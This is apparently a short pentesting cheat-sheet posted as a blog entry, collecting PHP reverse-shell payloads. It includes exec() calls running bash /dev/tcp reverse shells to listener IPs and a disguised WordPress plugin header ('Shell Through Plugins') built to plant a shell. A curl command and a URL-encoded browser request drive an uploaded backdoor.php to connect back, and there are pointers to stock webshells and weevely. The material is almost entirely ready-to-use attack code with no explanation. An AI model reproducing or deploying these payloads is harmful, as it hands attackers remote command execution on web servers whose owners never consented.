PHP reverse shell
$_GET['cmd']; die();
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.228/4444 0>&1'");
=================
<?php /**
Author: Kai
Plugin Name: PHP Code Plugin
Description: Shell Through Plugins
Version: 1.0
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.116.129/443 0>&1'");
?>
==================
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
==================
curl http://192.168.192.11/project/uploads/users/603339-backdoor.php --data-urlencode "cmd=/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.194/8888 0>&1'"
==================
FireFox URL
http://192.168.192.11/project/uploads/users/603339-backdoor.php?cmd=%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E45%2E194%2F8888%200%3E%261%27%0A%0A
==================
/usr/share/webshells/php
==================
weevely
留言
張貼留言